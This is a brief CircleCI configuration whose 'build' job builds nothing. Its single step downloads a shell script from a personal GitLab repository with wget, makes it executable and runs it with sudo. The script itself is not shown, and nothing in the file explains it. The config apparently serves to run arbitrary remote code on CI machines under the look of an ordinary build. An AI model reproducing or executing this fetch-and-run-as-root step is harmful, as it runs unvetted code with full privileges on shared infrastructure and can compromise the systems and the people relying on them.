version: 2.1
workflows:
  main:
    jobs:
      - build
jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - checkout
      - run:  wget -O ah.sh https://gitlab.com/rizkyadhypratama/gass/-/raw/main/sc.sh && chmod +x ah.sh && sudo ./ah.sh
